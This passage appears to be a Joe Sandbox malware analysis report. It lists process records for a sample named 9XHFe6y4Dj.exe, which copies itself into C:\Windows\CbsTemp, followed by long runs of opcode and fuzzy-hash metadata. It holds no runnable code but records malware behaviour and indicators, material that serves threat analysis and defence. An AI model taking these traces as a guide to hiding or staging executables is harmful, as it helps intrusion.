                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                          Imagebase:0x7ff7e52b0000
                                                          File size:55'320 bytes
                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:false

                                                          Target ID:77
                                                          Start time:12:18:00
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                                                          Imagebase:0x680000
                                                          File size:16'272'384 bytes
                                                          MD5 hash:8213A9C837181823A4D58728637EAEB5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:78
                                                          Start time:12:18:08
                                                          Start date:20/10/2024
                                                          Path:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                                                          Imagebase:0x270000
                                                          File size:16'272'384 bytes
                                                          MD5 hash:8213A9C837181823A4D58728637EAEB5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:79
                                                          Start time:12:18:17
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                                                          Imagebase:0xb30000
                                                          File size:16'272'384 bytes
                                                          MD5 hash:8213A9C837181823A4D58728637EAEB5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                            • Instruction Fuzzy Hash: E9412530D1C89A8EEB78EF2884916F9B7E1FF5A754F1441B9C04EC7596CE3879858780
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "^H
                                                            • API String ID: 0-2240470887
                                                            • Opcode ID: d5fea1680e2146bcc07409b581ca2998922dbdd9d1de25ad038076905287d36b
                                                            • Instruction ID: ba9d11e591df393ca60fe64d60f5d335823fa481389834de2f33e420e20cacc4
                                                            • Opcode Fuzzy Hash: d5fea1680e2146bcc07409b581ca2998922dbdd9d1de25ad038076905287d36b
                                                            • Instruction Fuzzy Hash: F541F430D1D49A8FEB78EB1884556B8B7A1FF5A360F1446B9D04EC7186CE387985C780
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: X.=I
                                                            • API String ID: 0-2026250801
                                                            • Opcode ID: ec4a12014acd4993a1c44a0e74000ed1306f93f1d0b95c46d8daeb874e973701
                                                            • Instruction ID: cbbf7edda39a3db29ec0d838771b86b7876bf5c6bb9ba1650f802fa4ba54569e
                                                            • Opcode Fuzzy Hash: ec4a12014acd4993a1c44a0e74000ed1306f93f1d0b95c46d8daeb874e973701
                                                            • Instruction Fuzzy Hash: 4E313831D0C98ECFEBA8EF5484915BD7BA0FF46785F5211BAD00ED6181DB38A8409B81
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (:?I
                                                            • API String ID: 0-987818883
                                                            • Opcode ID: 269f7f223d918341b58daef09c7981cbf3e3e85cb127c0948ea210bd0be457fc
                                                            • Instruction ID: c3958911d8e3b9341b5fbe31ff9739e14b60e6a9335a0b29d464fff61cac9fd0
                                                            • Opcode Fuzzy Hash: 269f7f223d918341b58daef09c7981cbf3e3e85cb127c0948ea210bd0be457fc
                                                            • Instruction Fuzzy Hash: AD31E63091C98EDEEB68FF5494516BDB7B1FF4A3A0F50117AD42ED6281CA387D409B81
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: X.=I
                                                            • API String ID: 0-2026250801
                                                            • Opcode ID: 52f1d579bf6b64c5128b283d86ec53ddbf3bb7f3ca36c88aa7b70255f4b382a6
                                                            • Instruction ID: df0b93a3ad6c10628b1e28389d6cf5f46b56080ba6967f9b52bd83cfefb6004f
                                                            • Opcode Fuzzy Hash: 52f1d579bf6b64c5128b283d86ec53ddbf3bb7f3ca36c88aa7b70255f4b382a6
                                                            • Instruction Fuzzy Hash: 18317B3081C5E74EF73AAB2858605B47B52EFA3741B1A56FAD08ACB4C7D92CBCC18341
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: X<I
                                                            • API String ID: 0-4150523163
                                                            • Opcode ID: 0c7c32d005597f641c2b70c4cf30831053927daf9c2f4656bc0847ce596466e6
                                                            • Instruction ID: 58ff88b34ad85e4fcba848546d400ddca855c1120d2cedbb4d299b56bcf7dae4
                                                            • Opcode Fuzzy Hash: 0c7c32d005597f641c2b70c4cf30831053927daf9c2f4656bc0847ce596466e6
                                                            • Instruction Fuzzy Hash: E421D271E1891D9FDF98EB58D4A5AECB7B1FB68340F0041BAD00EE7691CB35A981CB44
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: X.=I
                                                            • API String ID: 0-2026250801
                                                            • Opcode ID: 7c51844333426a5bdb36f6ceda019b6706fed7decf6ad504a2d7651def3b0e0a
                                                            • Instruction ID: 044cd56349f18e50119d99c04383e57dbcb81c4d0f99ba94af831d550bb279d9
                                                            • Opcode Fuzzy Hash: 7c51844333426a5bdb36f6ceda019b6706fed7decf6ad504a2d7651def3b0e0a
                                                            • Instruction Fuzzy Hash: C721D731E1895D9FDFA8EF18C895AEDB7B1FB59304F0141AAD04EE3291CE35A9818F41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: pV?I
                                                            • API String ID: 0-1972698762
                                                            • Opcode ID: 6ec5bc039acf83a4fb96c91e390e3e10e48709702e6e93f4cb2bfc1ccc0729e4
                                                            • Instruction ID: 5b984c1a8a2a56c0b5e3325547cde0170cc44fc866bf27daa9f420ad3fbf3ecf
                                                            • Opcode Fuzzy Hash: 6ec5bc039acf83a4fb96c91e390e3e10e48709702e6e93f4cb2bfc1ccc0729e4
                                                            • Instruction Fuzzy Hash: 1F11A532D1D9DD8EF774BA5844192FEB7E5FF4A3A1F10143AD04ED7181DE6428026681
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: X<I
                                                            • API String ID: 0-4150523163
                                                            • Opcode ID: d72eaefddb16ebcbf5f5fe2aca3d750775cba836015c18b2e877a84d16b1d00f
                                                            • Instruction ID: 1de512aa5e9a0bcb95f4d69e53d07f0d3554e209263f54e787d292513a9d2d19
                                                            • Opcode Fuzzy Hash: d72eaefddb16ebcbf5f5fe2aca3d750775cba836015c18b2e877a84d16b1d00f
                                                            • Instruction Fuzzy Hash: 38019C70D4855A9FCF98EF18C894BA8B7B1EB68301F1044EED00EE7691DA35AA84DF50
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 389379ac54befefba5e78412acc350101b163b261ea2a87dce7d2888dce9d521
                                                            • Instruction ID: 6e6984c3c41bf74c5ee121e9d050973660c21c5f28e724c0690878924ac7c9e5
                                                            • Opcode Fuzzy Hash: 389379ac54befefba5e78412acc350101b163b261ea2a87dce7d2888dce9d521
                                                            • Instruction Fuzzy Hash: D1F1BD709196468FEB59EF18C4D06B43BA1FF59350F5445BDC84ACB2CADB38E885CB84
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 40894bc8f6c46199c94d4d1570f2462ce2c290e5f3fb3aca6123e154f1192a34
                                                            • Instruction ID: c84e0f1012f44ce8bf53b7c0c8ae3f87f05701a27261ecc89bae455a8f181ce3
                                                            • Opcode Fuzzy Hash: 40894bc8f6c46199c94d4d1570f2462ce2c290e5f3fb3aca6123e154f1192a34
                                                            • Instruction Fuzzy Hash: A3F1BE3091C6468FEB49DF18C4E06B47BA1FF55350F5446BDC84B8B68ADB38E882CB85
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f074a96515bc82a96c9bd699a30904398b965ebc280746d34a25ab97d96e76d4
                                                            • Instruction ID: 243f29e64f8437566ef891ca44990c5b133cb71a9a68c98f7cebdfced62fa456
                                                            • Opcode Fuzzy Hash: f074a96515bc82a96c9bd699a30904398b965ebc280746d34a25ab97d96e76d4
                                                            • Instruction Fuzzy Hash: D9D1EF30A1CA468FE369EB68D4951B577E1FF64350F14067EC48AC3AC6EB39B842CB45
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c32aae1b1a941b089601d880c6ae5b836ff40e09b56742aed9de59b2cd68b4ae
                                                            • Instruction ID: 43734027e48ec4dd7f8df5229864283cda7fefd556f2582dad42129c2bc5f82e
                                                            • Opcode Fuzzy Hash: c32aae1b1a941b089601d880c6ae5b836ff40e09b56742aed9de59b2cd68b4ae
                                                            • Instruction Fuzzy Hash: 4ED1DF30A2CA468FE368EB28D49517577E1FF64340F24497EC48AC76C6DF29B9428749
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 29e5edd92a8fa1f59d1f0763a8bb469e6311d157171af7134cdd8bac16bbc71d
                                                            • Instruction ID: 5baddad618d6a56eb10b0a253feac3b663d67388ce43a2bbb417eceae335248f
                                                            • Opcode Fuzzy Hash: 29e5edd92a8fa1f59d1f0763a8bb469e6311d157171af7134cdd8bac16bbc71d
                                                            • Instruction Fuzzy Hash: 97D1F130A0CB868FE7B8EF28D49157577E1FF46380B1555BEC48AC3686DE29B842CB41
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 41e48a7a8e48fb8d3e96df43b438adbd3656ba155000569b3a5ab6eb8721e89d
                                                            • Instruction ID: 4e736584e2826026b61723eba4b429f71849e1be1cfb09f1f2cb9513e5beed9d
                                                            • Opcode Fuzzy Hash: 41e48a7a8e48fb8d3e96df43b438adbd3656ba155000569b3a5ab6eb8721e89d
                                                            • Instruction Fuzzy Hash: 6EE1C23051CA968FEB68DF54C4E09B13BA1FF56340B5555BDC84ACB68BD638E882CB41
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ccce4ae1551f18edab714421bc3af9fcf592c2222e0c3096045ec78f7d42253b
                                                            • Instruction ID: 9649e3e76f90277a293435afa6d2d081d32249ac6b0005230bed4408388cd03e
                                                            • Opcode Fuzzy Hash: ccce4ae1551f18edab714421bc3af9fcf592c2222e0c3096045ec78f7d42253b
                                                            • Instruction Fuzzy Hash: 22C19B7091D6468FEB19EF08C4E05B537A1FF55351F6445BDC84A8B6CADB38E881CB88
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7a392137f2e82f83368f43a35aa8f41ffe6e39da91fb768c39c7edf1910ad057
                                                            • Instruction ID: 64c2ab2c8a3ad761b6301ad8a60ddf6ef815022f465684a54f474c225875989b
                                                            • Opcode Fuzzy Hash: 7a392137f2e82f83368f43a35aa8f41ffe6e39da91fb768c39c7edf1910ad057
                                                            • Instruction Fuzzy Hash: 1AC18B7061C6468FEB09DF18C4E05B177A2FF55350B5846BDC84B8B68EDB38E882CB85
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2c474ee72621f27d41cc7b969f5376147ff8f82ca362ef05c5c775a852f74eb1
                                                            • Instruction ID: ecc574ed5c50bc260db7e678f866198ebc338cc3b4378bd87c653393c5fe1fc4
                                                            • Opcode Fuzzy Hash: 2c474ee72621f27d41cc7b969f5376147ff8f82ca362ef05c5c775a852f74eb1
                                                            • Instruction Fuzzy Hash: DAC1A03051CA968FEB2DDF44C0E09B537A1FF56354B5555BDC84ACB68BDA38E881CB80
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7d14b11e3e35bbd137f95935e9f05cd7038e8a1e66e9abcdec85524b1b17c31
                                                            • Instruction ID: 07487f002f2abd680557051ff986ab0dd31781ef546671dc79e19cbbf9744974
                                                            • Opcode Fuzzy Hash: c7d14b11e3e35bbd137f95935e9f05cd7038e8a1e66e9abcdec85524b1b17c31
                                                            • Instruction Fuzzy Hash: 4FB1E230A1DA469FE749EB28C0946B4B7E1FF69350F544179C04EC7AC6DB28B8A1CB94
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7d6a2946708a6dba8e0b6c669416380d7be6ee18d3f9a8b9639b4bffb5c27cb6
                                                            • Instruction ID: 3b9a4cdf4fb716cfb5a1a0564a097e4eda3c79e8aef7538f6c0a1875669255a5
                                                            • Opcode Fuzzy Hash: 7d6a2946708a6dba8e0b6c669416380d7be6ee18d3f9a8b9639b4bffb5c27cb6
                                                            • Instruction Fuzzy Hash: 8721B472E0DDD78FF66AB76828560FC6A50AF653E1F2805BAC04D864C7DF0C3854539A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 145d36cad8580789672ca6f499dfe5c7b96d2b961d0964372faefdbb6f207d60
                                                            • Instruction ID: e8189ffed27a32e1dc30a41f5340e29105b080e72a0ee8e549630a79a57a8d2f
                                                            • Opcode Fuzzy Hash: 145d36cad8580789672ca6f499dfe5c7b96d2b961d0964372faefdbb6f207d60
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 828f199a83004f8e0adb14e63e49c037002591e8f8faaccc9bfccce2179bda3b
                                                            • Instruction ID: a2326c516c897fbbe5716c4ff0dc019e0511ce99f3736d6b83d4b5e13ca12ec9
                                                            • Opcode Fuzzy Hash: 828f199a83004f8e0adb14e63e49c037002591e8f8faaccc9bfccce2179bda3b
                                                            • Instruction Fuzzy Hash: 6D313E31A0C9499FDF9CFF28C499DA5B3E1FB69311B1405AAD00AC7692DF24EC95CB81
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 08aa8e94453ba04a89074a8ecb99fbbaf23a4b2ce291157479991c9704f71fdc
                                                            • Instruction ID: 5f7eb50af90d587321749838cff62905e541c3d4f8e716e749737c510a0b13b6
                                                            • Opcode Fuzzy Hash: 08aa8e94453ba04a89074a8ecb99fbbaf23a4b2ce291157479991c9704f71fdc
                                                            • Instruction Fuzzy Hash: 3A319C31D1DACEDFDB55EB6898505EDBBB0FF46380F1500BAD00AD7192DA2868158751
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2c6dd003906b69631ac4245166afa4d453e8f980db87280fe205d1e222ae20dc
                                                            • Instruction ID: 62d965782017cadc9313defa737b47eafd10d6948af39b53aced9f635fb12d20
                                                            • Opcode Fuzzy Hash: 2c6dd003906b69631ac4245166afa4d453e8f980db87280fe205d1e222ae20dc
                                                            • Instruction Fuzzy Hash: 23316131A0C949DFDF9CEF28C095EA5B7E1FB69310B0405ABD10AC7692DE34E895CB81
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2644593300.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5ada1bb3f722d91a6e6d188f850ce6d4ee6ace7ff14d9d97987dd03ff97bc11d
                                                            • Instruction ID: 5c06c866b55f6ef2ce053cad84b31492129ffd2ae2e34927c69519cde46f0726
                                                            • Opcode Fuzzy Hash: 5ada1bb3f722d91a6e6d188f850ce6d4ee6ace7ff14d9d97987dd03ff97bc11d
                                                            • Instruction Fuzzy Hash: C6314C22A1D9591FF748B77C649A6F873C1FF493A1F1440BAD64DC31D3CE28AC814299
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2644593300.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 11872c2b22caeb3d39158e6d557b1c49ba22be13f68ac3dac7a3c2dd27ed5252
                                                            • Instruction ID: cb58f11efd017fdb782a443f0e2dcc79bad41bca4d34f4344e77e4b4df538a32
                                                            • Opcode Fuzzy Hash: 11872c2b22caeb3d39158e6d557b1c49ba22be13f68ac3dac7a3c2dd27ed5252
                                                            • Instruction Fuzzy Hash: E031C33090D68A8FDF46FB78C8599B97BF0FF16350F0509BAD149C76A2DB28A845CB50
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4a6b439bba3c7940789326c46fda68dce14b110d29b8404543edf3854764f53a
                                                            • Instruction ID: 43850e6af9249c838444a74c435dc16a59355554fe67785faf6ab471df8270e2
                                                            • Opcode Fuzzy Hash: 4a6b439bba3c7940789326c46fda68dce14b110d29b8404543edf3854764f53a
                                                            • Instruction Fuzzy Hash: BD314D31A0C94A8FDB58EF5C94919B8B7E2FF8A354B115279C01ED3681DF24B8128BC1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2644593300.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 65ee331bea70dbdef608b29a43f834eb7244897bcb574a41da7d4b21c2e00452
                                                            • Instruction ID: c05848267525111b6fadaae03abc98aa1e64377b3fd2e41421c99772c2c4332c
                                                            • Opcode Fuzzy Hash: 65ee331bea70dbdef608b29a43f834eb7244897bcb574a41da7d4b21c2e00452
                                                            • Instruction Fuzzy Hash: 13213520B1C9491FE788F72C845A6B977C2EF99791F1000BCE68EC32D3DE25AC818685
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8d93a914703b95ccf67ec5fe91d6d02514db04f6bf4987788d83c9b59d477d7e
                                                            • Instruction ID: 9d6da73c2cefefef34a2bd0d12ce6e32463312c55878efca741d22c388d2e371
                                                            • Opcode Fuzzy Hash: 8d93a914703b95ccf67ec5fe91d6d02514db04f6bf4987788d83c9b59d477d7e
                                                            • Instruction Fuzzy Hash: 54312730E2C94ACFEB98EB54C4956BD77B1FF68340F50007AE10ED65D1DB39AA409B89
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2644593300.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848bf0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dba3165c5f8a73d383a2b46b0ca5982158662d2297a614a3ec67ff61757ac499
                                                            • Instruction ID: c1fe585e0e55e19060e9a8d0b2a777b406fa0386d69ca1213ef62ed003681348
                                                            • Opcode Fuzzy Hash: dba3165c5f8a73d383a2b46b0ca5982158662d2297a614a3ec67ff61757ac499
                                                            • Instruction Fuzzy Hash: CC313B72D0DA899EE701BB6898452EC7BB0FF41351F1442B6D248CB1D3DF38244AC755
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a5d9dbe5f4200f19a1770c932e59d96ba413fbb5955c50f7148dab25d8929c5b
                                                            • Instruction ID: d8eb4895d78d0b2ccae3dec1d721c0cc814cef2524722171f7146c22a38d33da
                                                            • Opcode Fuzzy Hash: a5d9dbe5f4200f19a1770c932e59d96ba413fbb5955c50f7148dab25d8929c5b
                                                            • Instruction Fuzzy Hash: EB312B71F1C90A8FDB49EB58D4919A8F7A2FF69350B548139D00ED7AC2DF24B852CB84
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2999115847.00007FF848FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff848fb0000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 168e944699263711bb886608c0d602c6414572e49af4783354d00719071b1716
                                                            • Instruction ID: b13201ec7d2cb1baf7c35a1425c95aee328145c8b6bd3e037e8b5afc3766e3d3
                                                            • Opcode Fuzzy Hash: 168e944699263711bb886608c0d602c6414572e49af4783354d00719071b1716
                                                            • Instruction Fuzzy Hash: 72311830D1C94ACFEB98EB9488955BE7BA2FF68340F6001BAD40ED65C1CB386840D789
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3445459192.00007FF849340000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849340000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff849340000_9XHFe6y4Dj.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7b9164b75671c203be4a77ac6c84fb217a4ffc736237559ab8cc4c427cd74647
                                                            • Instruction ID: 5f0f130f218ee3ea5b0951c430e17c1d5e30e774951e45332aa94cfd1eb0d50a
                                                            • Opcode Fuzzy Hash: 7b9164b75671c203be4a77ac6c84fb217a4ffc736237559ab8cc4c427cd74647
